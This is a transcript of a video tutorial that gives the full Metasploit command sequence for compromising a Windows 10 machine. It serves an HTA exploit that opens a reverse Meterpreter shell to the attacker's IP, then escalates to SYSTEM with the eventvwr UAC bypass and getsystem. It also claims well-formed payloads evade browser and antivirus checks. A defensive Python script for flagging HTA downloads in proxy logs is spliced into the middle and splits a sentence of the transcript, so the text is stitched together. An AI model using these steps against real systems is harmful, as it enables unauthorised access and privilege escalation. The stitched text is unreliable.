targets. For example, like we already discussed, I'm running this virtual machine on a Windows 10 host machine, so if I open the command prompt on my Windows 10 over here, if I need to check the IP address I go with ipconfig; here you can see the IP address of this local machine. Moving on, if we have to attack that machine, let's say we want to see what kind of exploits are going to work over there. Now we already know that Windows has some common vulnerabilities; one of those vulnerabilities is the HTA server vulnerability. HTA is supposed to be an HTML application, but when passed the right payload it can be used to open a backdoor into a system. To start off with Metasploit and accessing such applications, we're going to use the command use exploit and the name of the HTA server, which is this: exploit/windows/misc/hta_server (misc for miscellaneous). As you can see it already found this one. All right, now there are some options that we need to set for this exploit to go through; for example, you can see some of the options over here. There's a payload; the payload is supposed to be the malicious file that we are going to send in the HTML application, which allows us to get the backdoor. For example, right now the payload, which is the malicious file, is windows/meterpreter/reverse_tcp, completely understandable. Now let's set the LHOST. LHOST and RHOST and SRVHOST should be the one where we are going to launch the attack from; for example, if we launch another tab of this console and we just type ifconfig, the IP address is 192.168.72.130.
So we're going to set LHOST as 192.168.72.130 and we're going to do the same thing with SRVHOST. We're going to set a port where we need to capture the backdoor access. Next, the payload has already been set; this payload will launch a backdoor and give us Meterpreter access to the system. Meterpreter can be considered as an upgrade of a normal command prompt shell; we will look into it once we get the access in the first place. Now that we have set the commands we can type exploit and press Enter. Now you can see we have a URL over here; we're going to copy this URL. Once the URL is copied we take it into the browser and paste it. This will ask us to download this file. Now as per browser security settings this file should be blocked by default; we can decide to keep it, and with the correct formulation of this malicious package even the web browser and antivirus software will not be able to detect good payloads. We're going to save this file and we're going to open it. "Publisher could not be verified"; if we press Run and we go back to our Metasploit console over here, you can see the HTA server has already captured a URL and it is writing "Delivering payload". We just have to wait for a few seconds. So the payload is delivered, it has sent this much amount of data, Meterpreter session 1 is opened, and we should get the access soon. There we go. Now to understand where the session is set we can write sessions -i; as you can see it has a Meterpreter over here. We're going to write sessions -i, the session ID is 1, so we're going to write 1 and we have the Meterpreter access. Now to get a fair idea of the system we're going to write sysinfo and it's going to show the computer name, the OS, the architecture, all these things. We can write the help command to see what are the things that we can get out of the system: we can take screenshots, we can control the webcam and start a video chat, we can do a lot of things over here. There are other commands as well where we can change the file
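Seen from the defender's side, the delivery step above leaves a simple trace: a browser on the victim fetches an HTA file from a host that serves nothing else, often a bare IP address on an unusual port, and the response is served with the application/hta content type. As an added Python example (not code from the video or from the Metasploit project), this runs that check over web-proxy log lines and scores each HTA download by how far its source is from what the organization expects. The log format, the allowlist of internal hosts permitted to serve HTAs, the port 8080 and all addresses other than the video's 192.168.72.130 are constructed for illustration.

```python
"""Flag HTA downloads in web-proxy logs that came from unexpected sources.

Added example, not from the video or from Metasploit. The log lines,
the allowlist and the port are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Constructed log lines: time, client, method, URL, status, response content type.
SAMPLE_LOG = """\
2022-01-01T10:00:01Z 192.168.29.179 GET http://www.example.test/index.html 200 text/html
2022-01-01T10:00:07Z 192.168.29.179 GET http://192.168.72.130:8080/update 200 application/hta
2022-01-01T10:00:09Z 192.168.29.179 GET http://intranet.example.test/tools/helper.hta 200 application/hta
2022-01-01T10:00:12Z 192.168.29.179 GET http://cdn.example.test/app.js 200 application/javascript
"""

# Constructed allowlist: the only internal host that legitimately serves HTAs.
ALLOWED_HTA_HOSTS = {"intranet.example.test"}

FIELDS = ("time", "client", "method", "url", "status", "ctype")


def parse_log_line(line):
    """Split one constructed-format proxy log line into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def is_bare_ip(host):
    """True when the URL host is a literal IPv4 address rather than a name."""
    return re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) is not None


def flag_hta_downloads(log_text, allowed_hosts=ALLOWED_HTA_HOSTS):
    """Return every HTA download with the reasons it looks out of place.

    An HTA is recognised by its content type or a .hta path. Downloads from an
    allowlisted host get severity "info"; anything else is "high" with reasons.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["url"])
        is_hta = rec["ctype"].lower() == "application/hta" or url.path.lower().endswith(".hta")
        if not is_hta:
            continue
        host = url.hostname or ""
        reasons = []
        if host not in allowed_hosts:
            reasons.append("host not allowlisted for HTA")
        if is_bare_ip(host):
            reasons.append("bare IP host")
        if url.port not in (None, 80):
            reasons.append("non-standard port %d" % url.port)
        findings.append({"time": rec["time"], "client": rec["client"],
                         "url": rec["url"], "reasons": reasons,
                         "severity": "high" if reasons else "info"})
    return findings


if __name__ == "__main__":
    for f in flag_hta_downloads(SAMPLE_LOG):
        print(f["severity"], f["client"], f["url"], f["reasons"])
```

The video's own observation that the browser warns and the publisher cannot be verified is the user-side control; this log rule is the network-side one, and together with simply blocking application/hta at the proxy for clients that have no business running HTAs it catches the delivery before the "Delivering payload" line ever appears.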
directory, like the cat command, the cd command; there are so many things that work in the normal cmd which we can run on Meterpreter as well. Now if you want to access the command prompt of the system directly, we can go with this: we have to write shell, and there we go, we are in the Downloads folder right now. To see if this is the same computer or not we're going to write ipconfig; as you can see it is our victim machine with 192.168.29.171. We can just press exit and we're back with the Meterpreter access. This is how we can use Meterpreter and Metasploit to gain access to a Windows 10 machine.

Next let's take a look at how we can get root access on a Windows 10 system. We just learned how we can get Meterpreter access on a system. We can background this Meterpreter session by writing background and pressing Enter; we can still see it with sessions -i, it's still present over here. Now these kinds of access are not administrative access; these are the kinds of backdoors that can be created for standard users. But to get complete access to a system, including the Program Files, the Windows documents, we need to have root access or administrative access. For that we're going to use another exploit. Reminder that the Meterpreter session with the standard access is already present and we're not messing with it right now; we're going to set up another session, albeit with the same machine. That exploit name is use exploit/windows/local/bypassuac_eventvwr, and there we go. Now if we check the options that we can put in the system, we have to choose an exploit target and we need to put a session as well. Let's say we're going to use session 1; this is the session that has the Meterpreter access with the standard user, it doesn't have the system user. We're going to write set session 1 and we're going to run exploit. It runs a few commands and it opened a second Meterpreter session; as you can see it is session 2.
If I write sysinfo you can still see I'm not the system user right now; I'm still just a normal user. How can we check that? If you go to shell it still shows the user, generally, Downloads, all these things. If I press exit and go back to Meterpreter, there is a command on Meterpreter, getsystem; it attempts to elevate your privilege to that of the local system, which basically means you get promoted into root access. So if we write getsystem, then due to pipe impersonation we now have the system root access. As you can see now it has become x64 and we are the admin user. Now if I go to shell I can easily go back to Windows and I can easily access these ones. This kind of control over the Windows folders and the Program Files folders, these kinds of things are not possible if you do not have admin access or the command prompt has not been run with admin permissions. This is how we can use privilege escalation to get into admin access on a system: we used the second exploit, which was the bypassuac_eventvwr exploit, and essentially used it with the first session. As you can read here, "Windows Escalate UAC Protection Bypass"; it was first disclosed in 2016 but it still works on some systems. This is how we can get root access on a Windows 10 installation. Hope you learned something new today. If you have any doubts regarding the topic mentioned in the lesson, please feel free to let us know in the comment section below.